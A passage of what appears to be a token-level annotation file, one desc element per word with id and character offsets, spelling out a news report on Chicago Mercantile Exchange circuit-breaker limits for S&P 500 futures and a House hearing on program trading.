<desc id="477" len="1" off="1321">a</desc>
<desc id="479" len="5" off="1323">total</desc>
<desc id="481" len="2" off="1329">of</desc>
<desc id="483" len="2" off="1332">30</desc>
<desc id="485" len="5" off="1335">index</desc>
<desc id="487" len="6" off="1341">points</desc>
<desc id="489" len="1" off="1347">,</desc>
<desc id="491" len="7" off="1349">hitting</desc>
<desc id="493" len="1" off="1357">a</desc>
<desc id="495" len="4" off="1359">Merc</desc>
<desc id="497" len="7" off="1364">circuit</desc>
<desc id="499" len="7" off="1372">breaker</desc>
<desc id="501" len="5" off="1380">limit</desc>
<desc id="503" len="4" off="1386">that</desc>
<desc id="505" len="8" off="1392">remained</desc>
<desc id="507" len="2" off="1401">in</desc>
<desc id="509" len="6" off="1404">effect</desc>
<desc id="511" len="3" off="1411">for</desc>
<desc id="513" len="3" off="1415">the</desc>
<desc id="515" len="4" off="1419">rest</desc>
<desc id="517" len="2" off="1424">of</desc>
<desc id="519" len="3" off="1427">the</desc>
<desc id="521" len="7" off="1431">trading</desc>
<desc id="523" len="7" off="1439">session</desc>
<desc id="525" len="1" off="1446">.</desc>
<desc id="528" len="3" off="1448">The</desc>
<desc id="530" len="4" off="1452">Merc</desc>
<desc id="532" len="4" off="1457">said</desc>
<desc id="534" len="4" off="1462">that</desc>
<desc id="536" len="3" off="1468">its</desc>
<desc id="538" len="8" off="1472">existing</desc>
<desc id="540" len="9" off="1481">30-minute</desc>
<desc id="542" len="1" off="1490">,</desc>
<desc id="544" len="8" off="1492">12-point</desc>
<desc id="546" len="5" off="1501">limit</desc>
<desc id="548" len="2" off="1507">on</desc>
<desc id="550" len="3" off="1510">S&P</desc>
<desc id="552" len="3" off="1514">500</desc>
<desc id="554" len="11" off="1518">stock-index</desc>
<desc id="556" len="7" off="1530">futures</desc>
<desc id="558" len="7" off="1538">trading</desc>
<desc id="3048" len="2" off="1546">is</desc>
<desc id="560" len="5" off="1549">equal</desc>
<desc id="562" len="2" off="1555">to</desc>
<desc id="564" len="5" off="1558">about</desc>
<desc id="566" len="3" off="1564">100</desc>
<desc id="568" len="6" off="1568">points</desc>
<desc id="570" len="2" off="1575">on</desc>
<desc id="572" len="3" off="1578">the</desc>
<desc id="574" len="3" off="1582">Dow</desc>
<desc id="576" len="5" off="1586">Jones</desc>
<desc id="578" len="11" off="1592">industrials</desc>
<desc id="580" len="1" off="1603">,</desc>
<desc id="582" len="5" off="1605">which</desc>
<desc id="584" len="3" off="1611">was</desc>
<desc id="586" len="9" off="1615">triggered</desc>
<desc id="588" len="4" off="1626">Oct.</desc>
<desc id="590" len="2" off="1631">13</desc>
<desc id="592" len="1" off="1633">,</desc>
<desc id="594" len="4" off="1635">will</desc>
<desc id="596" len="6" off="1640">remain</desc>
<desc id="598" len="2" off="1647">in</desc>
<desc id="600" len="6" off="1650">effect</desc>
<desc id="602" len="1" off="1656">.</desc>
<desc id="605" len="3" off="1658">Leo</desc>
<desc id="607" len="7" off="1662">Melamed</desc>
<desc id="609" len="1" off="1669">,</desc>
<desc id="611" len="4" off="1671">Merc</desc>
<desc id="613" len="9" off="1676">executive</desc>
<desc id="615" len="9" off="1686">committee</desc>
<desc id="617" len="8" off="1696">chairman</desc>
<desc id="619" len="1" off="1704">,</desc>
<desc id="621" len="4" off="1707">said</desc>
<desc id="623" len="4" off="1712">that</desc>
<desc id="625" len="3" off="1717">the</desc>
<desc id="627" len="8" off="1721">12-point</desc>
<desc id="629" len="5" off="1730">limit</desc>
<desc id="631" len="8" off="1736">appeared</desc>
<desc id="633" len="2" off="1745">to</desc>
<desc id="635" len="6" off="1748">lessen</desc>
<desc id="637" len="3" off="1755">the</desc>
<desc id="639" len="7" off="1759">selling</desc>
<desc id="641" len="5" off="1767">panic</desc>
<desc id="643" len="4" off="1773">Oct.</desc>
<desc id="645" len="2" off="1778">13</desc>
<desc id="647" len="1" off="1780">.</desc>
<desc id="650" len="3" off="1783">But</desc>
<desc id="652" len="4" off="1787">when</desc>
<desc id="654" len="3" off="1792">the</desc>
<desc id="656" len="8" off="1796">contract</desc>
<desc id="658" len="8" off="1805">reopened</desc>
<desc id="660" len="1" off="1813">,</desc>
<desc id="662" len="3" off="1815">the</desc>
<desc id="664" len="10" off="1819">subsequent</desc>
<desc id="666" len="5" off="1830">flood</desc>
<desc id="668" len="2" off="1836">of</desc>
<desc id="670" len="4" off="1839">sell</desc>
<desc id="672" len="6" off="1844">orders</desc>
<desc id="674" len="4" off="1851">that</desc>
<desc id="676" len="7" off="1857">quickly</desc>
<desc id="678" len="7" off="1865">knocked</desc>
<desc id="680" len="3" off="1873">the</desc>
<desc id="682" len="8" off="1877">contract</desc>
<desc id="684" len="4" off="1886">down</desc>
<desc id="686" len="2" off="1891">to</desc>
<desc id="688" len="3" off="1894">the</desc>
<desc id="690" len="8" off="1898">30-point</desc>
<desc id="692" len="5" off="1907">limit</desc>
<desc id="694" len="9" off="1913">indicated</desc>
<desc id="696" len="4" off="1923">that</desc>
<desc id="698" len="3" off="1928">the</desc>
<desc id="700" len="12" off="1933">intermediate</desc>
<desc id="702" len="5" off="1946">limit</desc>
<desc id="704" len="2" off="1952">of</desc>
<desc id="706" len="2" off="1955">20</desc>
<desc id="708" len="6" off="1958">points</desc>
<desc id="710" len="3" off="1965">was</desc>
<desc id="712" len="6" off="1969">needed</desc>
<desc id="714" len="2" off="1976">to</desc>
<desc id="716" len="4" off="1979">help</desc>
<desc id="718" len="4" off="1984">keep</desc>
<desc id="720" len="5" off="1989">stock</desc>
<desc id="722" len="3" off="1995">and</desc>
<desc id="724" len="11" off="1999">stock-index</desc>
<desc id="726" len="7" off="2012">futures</desc>
<desc id="728" len="6" off="2020">prices</desc>
<desc id="730" len="12" off="2027">synchronized</desc>
<desc id="732" len="1" off="2039">.</desc>
<desc id="735" len="7" off="2041">Several</desc>
<desc id="737" len="7" off="2049">traders</desc>
<desc id="739" len="10" off="2057">maintained</desc>
<desc id="741" len="4" off="2068">that</desc>
<desc id="743" len="3" off="2073">the</desc>
<desc id="745" len="4" off="2077">Merc</desc>
<desc id="747" len="2" off="2081">'s</desc>
<desc id="749" len="8" off="2084">12-point</desc>
<desc id="751" len="15" off="2094">circuit-breaker</desc>
<desc id="753" len="10" off="2110">aggravated</desc>
<desc id="755" len="3" off="2121">the</desc>
<desc id="757" len="6" off="2125">market</desc>
<desc id="759" len="5" off="2132">slide</desc>
<desc id="761" len="4" off="2138">Oct.</desc>
<desc id="763" len="2" off="2143">13</desc>
<desc id="765" len="2" off="2146">by</desc>
<desc id="767" len="9" off="2149">directing</desc>
<desc id="769" len="10" off="2159">additional</desc>
<desc id="771" len="7" off="2171">selling</desc>
<desc id="773" len="8" off="2179">pressure</desc>
<desc id="775" len="2" off="2188">to</desc>
<desc id="777" len="3" off="2191">the</desc>
<desc id="779" len="5" off="2195">floor</desc>
<desc id="781" len="2" off="2201">of</desc>
<desc id="783" len="3" off="2204">the</desc>
<desc id="785" len="3" off="2208">New</desc>
<desc id="787" len="4" off="2212">York</desc>
<desc id="789" len="5" off="2217">Stock</desc>
<desc id="791" len="8" off="2223">Exchange</desc>
<desc id="793" len="1" off="2231">.</desc>
<desc id="796" len="3" off="2233">All</desc>
<desc id="798" len="2" off="2237">of</desc>
<desc id="800" len="3" off="2240">the</desc>
<desc id="802" len="7" off="2244">changes</desc>
<desc id="804" len="7" off="2253">require</desc>
<desc id="806" len="10" off="2261">regulatory</desc>
<desc id="808" len="8" off="2272">approval</desc>
<desc id="810" len="1" off="2280">,</desc>
<desc id="812" len="5" off="2282">which</desc>
<desc id="814" len="2" off="2288">is</desc>
<desc id="816" len="8" off="2291">expected</desc>
<desc id="818" len="7" off="2300">shortly</desc>
<desc id="820" len="1" off="2307">.</desc>
<desc id="823" len="3" off="2309">The</desc>
<desc id="825" len="8" off="2313">exchange</desc>
<desc id="827" len="4" off="2322">also</desc>
<desc id="829" len="4" off="2327">said</desc>
<desc id="831" len="4" off="2333">that</desc>
<desc id="833" len="3" off="2338">the</desc>
<desc id="835" len="8" off="2342">30-point</desc>
<desc id="837" len="7" off="2351">circuit</desc>
<desc id="839" len="7" off="2359">breaker</desc>
<desc id="841" len="1" off="2366">,</desc>
<desc id="843" len="5" off="2368">which</desc>
<desc id="845" len="9" off="2374">currently</desc>
<desc id="847" len="8" off="2384">provides</desc>
<desc id="849" len="4" off="2393">only</desc>
<desc id="851" len="1" off="2398">a</desc>
<desc id="853" len="8" off="2400">one-hour</desc>
<desc id="855" len="7" off="2410">respite</desc>
<desc id="857" len="6" off="2418">during</desc>
<desc id="859" len="6" off="2425">market</desc>
<desc id="861" len="9" off="2432">sell-offs</desc>
<desc id="863" len="1" off="2441">,</desc>
<desc id="865" len="4" off="2443">will</desc>
<desc id="867" len="6" off="2448">become</desc>
<desc id="869" len="3" off="2455">the</desc>
<desc id="871" len="7" off="2459">maximum</desc>
<desc id="873" len="7" off="2467">one-day</desc>
<desc id="875" len="5" off="2475">limit</desc>
<desc id="877" len="3" off="2481">for</desc>
<desc id="879" len="3" off="2485">the</desc>
<desc id="881" len="3" off="2490">S&P</desc>
<desc id="883" len="3" off="2494">500</desc>
<desc id="885" len="11" off="2498">stock-index</desc>
<desc id="887" len="7" off="2510">futures</desc>
<desc id="889" len="8" off="2518">contract</desc>
<desc id="891" len="1" off="2526">;</desc>
<desc id="893" len="3" off="2528">the</desc>
<desc id="895" len="7" off="2532">one-day</desc>
<desc id="897" len="5" off="2540">limit</desc>
<desc id="899" len="3" off="2546">now</desc>
<desc id="901" len="2" off="2550">is</desc>
<desc id="903" len="2" off="2553">50</desc>
<desc id="905" len="5" off="2556">index</desc>
<desc id="907" len="6" off="2562">points</desc>
<desc id="909" len="1" off="2568">.</desc>
<desc id="912" len="1" off="2571">A</desc>
<desc id="914" len="5" off="2573">final</desc>
<desc id="916" len="12" off="2579">modification</desc>
<desc id="918" len="3" off="2592">was</desc>
<desc id="920" len="4" off="2596">made</desc>
<desc id="922" len="2" off="2601">to</desc>
<desc id="924" len="3" off="2604">the</desc>
<desc id="926" len="10" off="2608">five-point</desc>
<desc id="928" len="7" off="2619">opening</desc>
<desc id="930" len="5" off="2627">limit</desc>
<desc id="932" len="3" off="2633">for</desc>
<desc id="934" len="3" off="2637">the</desc>
<desc id="936" len="8" off="2641">contract</desc>
<desc id="938" len="1" off="2649">.</desc>
<desc id="941" len="3" off="2652">The</desc>
<desc id="943" len="4" off="2656">Merc</desc>
<desc id="945" len="4" off="2661">said</desc>
<desc id="947" len="4" off="2666">that</desc>
<desc id="949" len="10" off="2671">five-point</desc>
<desc id="951" len="5" off="2682">limit</desc>
<desc id="953" len="4" off="2688">will</desc>
<desc id="955" len="6" off="2693">remain</desc>
<desc id="957" len="2" off="2700">in</desc>
<desc id="959" len="6" off="2703">effect</desc>
<desc id="961" len="3" off="2710">for</desc>
<desc id="963" len="3" off="2714">the</desc>
<desc id="965" len="5" off="2718">first</desc>
<desc id="967" len="2" off="2724">10</desc>
<desc id="969" len="7" off="2727">minutes</desc>
<desc id="971" len="2" off="2736">of</desc>
<desc id="973" len="7" off="2739">trading</desc>
<desc id="975" len="1" off="2746">.</desc>
<desc id="978" len="3" off="2748">The</desc>
<desc id="980" len="5" off="2752">limit</desc>
<desc id="982" len="6" off="2758">lapses</desc>
<desc id="984" len="5" off="2765">under</desc>
<desc id="986" len="7" off="2771">current</desc>
<desc id="988" len="8" off="2779">exchange</desc>
<desc id="990" len="5" off="2788">rules</desc>
<desc id="992" len="2" off="2794">if</desc>
<desc id="994" len="9" off="2797">contracts</desc>
<desc id="996" len="5" off="2807">trade</desc>
<desc id="998" len="5" off="2813">above</desc>
<desc id="1000" len="3" off="2820">the</desc>
<desc id="1002" len="5" off="2824">limit</desc>
<desc id="1004" len="5" off="2830">price</desc>
<desc id="1006" len="6" off="2836">during</desc>
<desc id="1008" len="3" off="2843">the</desc>
<desc id="1010" len="7" off="2847">opening</desc>
<desc id="1012" len="2" off="2855">10</desc>
<desc id="1014" len="7" off="2858">minutes</desc>
<desc id="1016" len="2" off="2866">of</desc>
<desc id="1018" len="7" off="2869">trading</desc>
<desc id="1020" len="1" off="2876">.</desc>
<desc id="1023" len="2" off="2878">In</desc>
<desc id="1025" len="10" off="2881">Washington</desc>
<desc id="1027" len="1" off="2891">,</desc>
<desc id="1029" len="5" off="2893">House</desc>
<desc id="1031" len="5" off="2900">aides</desc>
<desc id="1033" len="4" off="2906">said</desc>
<desc id="1035" len="3" off="2911">Mr.</desc>
<desc id="1037" len="6" off="2915">Phelan</desc>
<desc id="1039" len="4" off="2922">told</desc>
<desc id="1041" len="11" off="2927">congressmen</desc>
<desc id="1043" len="4" off="2939">that</desc>
<desc id="1045" len="3" off="2944">the</desc>
<desc id="1047" len="6" off="2948">collar</desc>
<desc id="1049" len="1" off="2954">,</desc>
<desc id="1051" len="5" off="2956">which</desc>
<desc id="1053" len="6" off="2962">banned</desc>
<desc id="1055" len="7" off="2969">program</desc>
<desc id="1057" len="6" off="2977">trades</desc>
<desc id="1059" len="7" off="2985">through</desc>
<desc id="1061" len="3" off="2993">the</desc>
<desc id="1063" len="3" off="2997">Big</desc>
<desc id="1065" len="5" off="3001">Board</desc>
<desc id="1067" len="2" off="3006">'s</desc>
<desc id="1069" len="8" off="3009">computer</desc>
<desc id="1071" len="4" off="3018">when</desc>
<desc id="1073" len="3" off="3023">the</desc>
<desc id="1075" len="3" off="3027">Dow</desc>
<desc id="1077" len="5" off="3031">Jones</desc>
<desc id="1079" len="10" off="3037">Industrial</desc>
<desc id="1081" len="7" off="3048">Average</desc>
<desc id="1083" len="5" off="3056">moved</desc>
<desc id="1085" len="2" off="3062">50</desc>
<desc id="1087" len="6" off="3066">points</desc>
<desc id="1089" len="1" off="3072">,</desc>
<desc id="1091" len="3" off="3074">did</desc>
<desc id="1093" len="3" off="3077">n't</desc>
<desc id="1095" len="4" off="3081">work</desc>
<desc id="1097" len="4" off="3086">well</desc>
<desc id="1099" len="1" off="3090">.</desc>
<desc id="1102" len="2" off="3092">He</desc>
<desc id="1104" len="4" off="3095">said</desc>
<desc id="1106" len="4" off="3100">that</desc>
<desc id="1108" len="5" off="3105">firms</desc>
<desc id="1110" len="5" off="3111">could</desc>
<desc id="1112" len="3" off="3117">get</desc>
<desc id="1114" len="6" off="3121">around</desc>
<desc id="1116" len="3" off="3128">the</desc>
<desc id="1118" len="6" off="3132">collar</desc>
<desc id="1120" len="2" off="3139">by</desc>
<desc id="1122" len="9" off="3142">executing</desc>
<desc id="1124" len="6" off="3153">trades</desc>
<desc id="1126" len="8" off="3160">manually</desc>
<desc id="1128" len="1" off="3168">.</desc>
<desc id="1131" len="2" off="3170">In</desc>
<desc id="1133" len="1" off="3173">a</desc>
<desc id="1135" len="12" off="3175">post-hearing</desc>
<desc id="1137" len="4" off="3188">news</desc>
<desc id="1139" len="10" off="3193">conference</desc>
<desc id="1141" len="1" off="3203">,</desc>
<desc id="1143" len="3" off="3205">Mr.</desc>
<desc id="1145" len="6" off="3209">Phelan</desc>
<desc id="1147" len="1" off="3215">,</desc>
<desc id="1149" len="3" off="3217">who</desc>
<desc id="1151" len="3" off="3221">has</desc>
<desc id="1153" len="8" off="3225">publicly</desc>
<desc id="1155" len="9" off="3235">expressed</desc>
<desc id="1157" len="7" off="3245">concern</desc>
<desc id="1159" len="5" off="3253">about</desc>
<desc id="1161" len="6" off="3259">market</desc>
<desc id="1163" len="10" off="3266">volatility</desc>
<desc id="1165" len="1" off="3276">,</desc>
<desc id="1167" len="4" off="3278">said</desc>
<desc id="1169" len="2" off="3283">he</desc>
<desc id="1171" len="4" off="3286">told</desc>
<desc id="1173" len="3" off="3291">the</desc>
<desc id="1175" len="5" off="3295">House</desc>
<desc id="1177" len="7" off="3301">finance</desc>
<desc id="1179" len="3" off="3309">and</desc>
<desc id="1181" len="18" off="3314">telecommunications</desc>
<desc id="1183" len="12" off="3333">subcommittee</desc>
<desc id="1185" len="4" off="3346">that</desc>
<desc id="1187" len="2" off="3351">he</desc>
<desc id="1189" len="5" off="3354">would</desc>
<desc id="1191" len="7" off="3360">support</desc>
<desc id="1193" len="3" off="3368">the</desc>
<desc id="1195" len="15" off="3372">program-trading</desc>
<desc id="1197" len="4" off="3388">halt</desc>
<desc id="1199" len="8" off="3393">proposal</desc>
<desc id="1201" len="2" off="3403">``</desc>
<desc id="1203" len="9" off="3405">providing</desc>
<desc id="1205" len="3" off="3415">the</desc>
<desc id="1207" len="3" off="3419">SEC</desc>
<desc id="1209" len="5" off="3423">would</desc>
<desc id="1211" len="2" off="3429">be</desc>
<desc id="1213" len="11" off="3432">comfortable</desc>
<desc id="1215" len="4" off="3444">with</desc>
<desc id="1217" len="3" off="3449">the</desc>
<desc id="1219" len="8" off="3453">language</desc>
<desc id="1221" len="2" off="3461">''</desc>
<desc id="1223" len="2" off="3464">in</desc>
<desc id="1225" len="1" off="3467">a</desc>
<desc id="1227" len="4" off="3469">bill</desc>
<desc id="1229" len="1" off="3473">.</desc>
<desc id="1232" len="3" off="3475">The</desc>
<desc id="1234" len="15" off="3480">program-trading</desc>
<desc id="1236" len="5" off="3496">issue</desc>
<desc id="1238" len="2" off="3502">is</desc>
<desc id="1240" len="7" off="3505">heating</desc>
<desc id="1242" len="2" off="3513">up</desc>
<desc id="1244" len="2" off="3516">on</desc>
<desc id="1246" len="7" off="3519">Capitol</desc>
<desc id="1248" len="4" off="3527">Hill</desc>
<desc id="1250" len="2" off="3532">as</desc>
<desc id="1252" len="2" off="3535">it</desc>
<desc id="1254" len="2" off="3538">is</desc>
<desc id="1256" len="2" off="3541">on</desc>
<desc id="1258" len="4" off="3544">Wall</desc>
<desc id="1260" len="6" off="3549">Street</desc>
<desc id="1262" len="1" off="3555">,</desc>
<desc id="1264" len="3" off="3557">and</desc>
<desc id="1266" len="7" off="3562">several</desc>
<desc id="1268" len="11" off="3570">legislators</desc>
<desc id="1270" len="4" off="3582">want</desc>
<desc id="1272" len="2" off="3587">to</desc>
<desc id="1274" len="5" off="3590">grant</desc>
<desc id="1276" len="3" off="3596">the</desc>
<desc id="1278" len="3" off="3600">SEC</desc>
<desc id="1280" len="3" off="3604">the</desc>
<desc id="1282" len="5" off="3608">power</desc>
<desc id="1284" len="2" off="3614">to</desc>
<desc id="1286" len="4" off="3617">shut</desc>
<desc id="1288" len="3" off="3622">off</desc>
<desc id="1290" len="3" off="3626">the</desc>
<desc id="1292" len="8" off="3630">programs</desc>
<desc id="1294" len="4" off="3640">when</desc>
<desc id="1296" len="7" off="3645">trading</desc>
<desc id="1298" len="7" off="3653">becomes</desc>
<desc id="1300" len="3" off="3661">too</desc>
<desc id="1302" len="8" off="3665">volatile</desc>
<desc id="1304" len="1" off="3673">.</desc>
<desc id="1307" len="3" off="3675">SEC</desc>
<desc id="1309" len="8" off="3679">Chairman</desc>
<desc id="1311" len="7" off="3688">Richard</desc>
<desc id="1313" len="7" off="3696">Breeden</desc>
<desc id="1315" len="3" off="3704">has</desc>
<desc id="1317" len="4" off="3708">said</desc>
<desc id="1319" len="2" off="3713">he</desc>
<desc id="1321" len="5" off="3716">would</desc>
<desc id="1323" len="2" off="3722">be</desc>
<desc id="1325" len="7" off="3726">willing</desc>
<desc id="1327" len="2" off="3734">to</desc>
<desc id="1329" len="8" off="3737">consider</desc>
<desc id="1331" len="7" off="3746">circuit</desc>
<desc id="1333" len="8" off="3754">breakers</desc>
<desc id="1335" len="4" off="3763">that</desc>
<desc id="1337" len="4" off="3768">have</desc>
<desc id="1339" len="6" off="3773">preset</desc>
<desc id="1341" len="7" off="3780">trigger</desc>
<desc id="1343" len="6" off="3788">points</desc>
<desc id="1345" len="1" off="3794">,</desc>
<desc id="1347" len="3" off="3796">but</desc>
<desc id="1349" len="2" off="3800">he</desc>
<desc id="1351" len="4" off="3803">does</desc>
<desc id="1353" len="3" off="3807">n't</desc>
<desc id="1355" len="4" off="3812">want</desc>
<desc id="1357" len="13" off="3817">discretionary</desc>
<desc id="1359" len="5" off="3831">power</desc>
<desc id="1361" len="2" off="3837">to</desc>
<desc id="1363" len="4" off="3840">stop</desc>
<desc id="1365" len="8" off="3845">programs</desc>
<desc id="1367" len="1" off="3853">.</desc>
<desc id="1370" len="1" off="3855">A</desc>
<desc id="1372" len="5" off="3857">House</desc>
<desc id="1374" len="4" off="3863">aide</desc>
<desc id="1376" len="9" off="3868">suggested</desc>
<desc id="1378" len="4" off="3878">that</desc>
<desc id="1380" len="3" off="3883">Mr.</desc>
<desc id="1382" len="6" off="3887">Phelan</desc>
<desc id="1384" len="3" off="3894">was</desc>
<desc id="1386" len="2" off="3899">so</desc>
<desc id="1388" len="2" off="3902">``</desc>
<desc id="1390" len="5" off="3904">vague</desc>
<desc id="1392" len="3" off="3910">and</desc>
<desc id="1394" len="5" off="3914">mushy</desc>
<desc id="1396" len="2" off="3919">''</desc>
<desc id="1398" len="4" off="3922">that</desc>
<desc id="1400" len="2" off="3927">it</desc>
<desc id="1402" len="3" off="3930">was</desc>
<desc id="1404" len="3" off="3934">the</desc>
<desc id="1406" len="4" off="3938">kind</desc>
<desc id="1408" len="2" off="3943">of</desc>
<desc id="1410" len="7" off="3946">meeting</desc>
<desc id="1412" len="5" off="3954">where</desc>
<desc id="1414" len="6" off="3960">people</desc>
<desc id="1416" len="2" off="3967">of</desc>
<desc id="1418" len="3" off="3970">all</desc>
<desc id="1420" len="10" off="3974">viewpoints</desc>
<desc id="1422" len="5" off="3986">could</desc>
<desc id="1424" len="2" off="3992">``</desc>
<desc id="1426" len="4" off="3994">come</desc>
<desc id="1428" len="3" off="3999">out</desc>
<desc id="1430" len="7" off="4003">feeling</desc>
<desc id="1432" len="4" off="4011">good</desc>
<desc id="1434" len="1" off="4015">.</desc>
<desc id="1436" len="2" off="4016">''</desc>
<desc id="1439" len="2" off="4019">At</desc>
<desc id="1441" len="3" off="4022">one</desc>
<desc id="1443" len="5" off="4026">point</desc>
<desc id="1445" len="1" off="4031">,</desc>
<desc id="1447" len="3" off="4033">Mr.</desc>
<desc id="1449" len="6" off="4037">Phelan</desc>
<desc id="1451" len="7" off="4044">angered</desc>
<desc id="1453" len="3" off="4052">the</desc>
<desc id="1455" len="12" off="4056">subcommittee</desc>
<desc id="1457" len="2" off="4068">'s</desc>
<desc id="1459" len="8" off="4072">chairman</desc>
<desc id="1461" len="1" off="4080">,</desc>
<desc id="1463" len="4" off="4082">Rep.</desc>
<desc id="1465" len="6" off="4087">Edward</desc>
<desc id="1467" len="6" off="4094">Markey</desc>
<desc id="1469" len="2" off="4101">D.</desc>
<desc id="1471" len="1" off="4103">,</desc>
<desc id="1473" len="5" off="4105">Mass.</desc>
<desc id="1475" len="1" off="4110">,</desc>
<desc id="1477" len="2" off="4112">by</desc>
<desc id="1479" len="3" off="4115">not</desc>
<desc id="1481" len="5" off="4119">going</desc>
<desc id="1483" len="4" off="4125">much</desc>
<desc id="1485" len="6" off="4130">beyond</desc>
<desc id="1487" len="4" off="4137">what</desc>
<desc id="1489" len="7" off="4142">already</desc>
<desc id="1491" len="3" off="4150">had</desc>
<desc id="1493" len="4" off="4154">been</desc>
<desc id="1495" len="8" off="4160">reported</desc>
<desc id="1497" len="2" off="4169">in</desc>
<desc id="1499" len="3" off="4172">the</desc>
<desc id="1501" len="7" off="4176">morning</desc>
<desc id="1503" len="10" off="4184">newspapers</desc>
<desc id="1505" len="1" off="4194">.</desc>
<desc id="1508" len="2" off="4196">``</desc>
<desc id="1510" len="6" off="4198">Markey</desc>
<desc id="1512" len="4" off="4205">said</desc>
<desc id="1514" len="2" off="4210">we</desc>
<desc id="1516" len="5" off="4213">could</desc>
<desc id="1518" len="4" off="4219">have</desc>
<desc id="1520" len="4" off="4224">done</desc>
<desc id="1522" len="4" off="4229">this</desc>
<desc id="1524" len="2" off="4234">in</desc>
<desc id="1526" len="6" off="4237">public</desc>
<desc id="1528" len="2" off="4243">''</desc>
<desc id="1530" len="7" off="4247">because</desc>
<desc id="1532" len="2" off="4255">so</desc>
<desc id="1534" len="6" off="4258">little</desc>
<desc id="1536" len="9" off="4265">sensitive</desc>
<desc id="1538" len="11" off="4275">information</desc>
<desc id="1540" len="3" off="4287">was</desc>
<desc id="1542" len="9" off="4291">disclosed</desc>
<desc id="1544" len="1" off="4300">,</desc>
<desc id="1546" len="3" off="4302">the</desc>
<desc id="1548" len="4" off="4306">aide</desc>
<desc id="1550" len="4" off="4311">said</desc>
<desc id="1552" len="1" off="4315">.</desc>
<desc id="1555" len="3" off="4317">Mr.</desc>
<desc id="1557" len="6" off="4321">Phelan</desc>
<desc id="1559" len="4" off="4328">then</desc>
<desc id="1561" len="9" off="4334">responded</desc>
<desc id="1563" len="4" off="4344">that</desc>
<desc id="1565" len="2" off="4349">he</desc>
<desc id="1567" len="5" off="4352">would</desc>
<desc id="1569" len="4" off="4358">have</desc>
<desc id="1571" len="4" off="4363">been</desc>
<desc id="1573" len="5" off="4368">happy</desc>
<desc id="1575" len="4" off="4374">just</desc>
<desc id="1577" len="7" off="4379">writing</desc>
<desc id="1579" len="1" off="4387">a</desc>
<desc id="1581" len="6" off="4389">report</desc>
<desc id="1583" len="2" off="4396">to</desc>
<desc id="1585" len="3" off="4399">the</desc>
<desc id="1587" len="5" off="4403">panel</desc>
<desc id="1589" len="1" off="4408">,</desc>
<desc id="1591" len="3" off="4410">the</desc>
<desc id="1593" len="4" off="4414">aide</desc>
<desc id="1595" len="5" off="4419">added</desc>
<desc id="1597" len="1" off="4424">.</desc>
<desc id="1600" len="2" off="4427">At</desc>
<desc id="1602" len="7" off="4430">another</desc>
<desc id="1604" len="5" off="4438">point</desc>
<desc id="1606" len="6" off="4444">during</desc>
<desc id="1608" len="3" off="4451">the</desc>
<desc id="1610" len="7" off="4455">hearing</desc>
<desc id="1612" len="1" off="4462">,</desc>
<desc id="1614" len="4" off="4464">Rep.</desc>
<desc id="1616" len="6" off="4469">Markey</desc>
<desc id="1618" len="5" off="4476">asked</desc>
<desc id="1620" len="3" off="4482">Mr.</desc>
<desc id="1622" len="6" off="4486">Phelan</desc>
<desc id="1624" len="4" off="4493">what</desc>
<desc id="1626" len="5" off="4498">would</desc>
<desc id="1628" len="2" off="4504">be</desc>
<desc id="1630" len="9" off="4507">discussed</desc>
<desc id="1632" len="2" off="4518">at</desc>
<desc id="1634" len="1" off="4521">a</desc>
<desc id="1636" len="3" off="4523">New</desc>
<desc id="1638" len="4" off="4527">York</desc>
<desc id="1640" len="8" off="4532">exchange</desc>
<desc id="1642" len="5" off="4541">board</desc>
<desc id="1644" len="7" off="4547">meeting</desc>
<desc id="1646" len="5" off="4555">today</desc>
<desc id="1648" len="1" off="4560">.</desc>
<desc id="1651" len="3" off="4562">Mr.</desc>
<desc id="1653" len="6" off="4566">Phelan</desc>
<desc id="1655" len="4" off="4573">said</desc>
<desc id="1657" len="3" off="4578">the</desc>
<desc id="1659" len="3" off="4582">Big</desc>
<desc id="1661" len="5" off="4586">Board</desc>
<desc id="1663" len="2" off="4592">is</desc>
<desc id="1665" len="6" off="4595">likely</desc>
<desc id="1667" len="2" off="4602">to</desc>
<desc id="1669" len="5" off="4606">study</desc>
<desc id="1671" len="3" off="4612">the</desc>
<desc id="1673" len="15" off="4616">program-trading</desc>
<desc id="1675" len="5" off="4632">issue</desc>
<desc id="1677" len="1" off="4637">.</desc>
<desc id="1680" len="4" off="4639">That</desc>
<desc id="1682" len="8" off="4644">response</desc>
<desc id="1684" len="7" off="4653">annoyed</desc>
<desc id="1686" len="4" off="4661">Rep.</desc>
<desc id="1688" len="6" off="4666">Markey</desc>
<desc id="1690" len="1" off="4672">,</desc>
<desc id="1692" len="5" off="4674">House</desc>
<desc id="1694" len="5" off="4680">aides</desc>
<desc id="1696" len="4" off="4686">said</desc>
<desc id="1698" len="1" off="4690">,</desc>
<desc id="1700" len="3" off="4692">and</desc>
<desc id="1702" len="3" off="4697">the</desc>
<desc id="1704" len="11" off="4701">congressman</desc>
<desc id="1706" len="7" off="4713">snapped</desc>
<desc id="1708" len="4" off="4721">back</desc>
<desc id="1710" len="4" off="4726">that</desc>
<desc id="1712" len="5" off="4731">there</desc>
<desc id="1714" len="3" off="4737">had</desc>
<desc id="1716" len="4" off="4741">been</desc>
<desc id="1718" len="6" off="4746">enough</desc>
<desc id="1720" len="7" off="4753">studies</desc>
<desc id="1722" len="2" off="4761">of</desc>
<desc id="1724" len="3" off="4764">the</desc>
<desc id="1726" len="5" off="4768">issue</desc>
<desc id="1728" len="3" off="4774">and</desc>
<desc id="1730" len="4" off="4778">that</desc>
<desc id="1732" len="2" off="4783">it</desc>
<desc id="1734" len="3" off="4787">was</desc>
<desc id="1736" len="4" off="4791">time</desc>
<desc id="1738" len="3" off="4796">for</desc>
<desc id="1740" len="6" off="4800">action</desc>
<desc id="1742" len="2" off="4807">on</desc>
<desc id="1744" len="3" off="4810">the</desc>
<desc id="1746" len="6" off="4814">matter</desc>
<desc id="1748" len="1" off="4820">.</desc>
<desc id="1751" len="7" off="4822">Fifteen</desc>
<desc id="1753" len="2" off="4830">of</desc>
<desc id="1755" len="3" off="4833">the</desc>
<desc id="1757" len="2" off="4837">26</desc>
<desc id="1759" len="12" off="4840">subcommittee</desc>
<desc id="1761" len="7" off="4853">members</desc>
<desc id="1763" len="8" off="4861">attended</desc>
<desc id="1765" len="3" off="4870">the</desc>
<desc id="1767" len="7" off="4875">hearing</desc>
<desc id="1769" len="1" off="4882">,</desc>
<desc id="1771" len="4" off="4884">most</desc>
<desc id="1773" len="7" off="4889">notably</desc>
<desc id="1775" len="4" off="4897">Rep.</desc>
<desc id="1777" len="4" off="4902">John</desc>
<desc id="1779" len="7" off="4907">Dingell</desc>
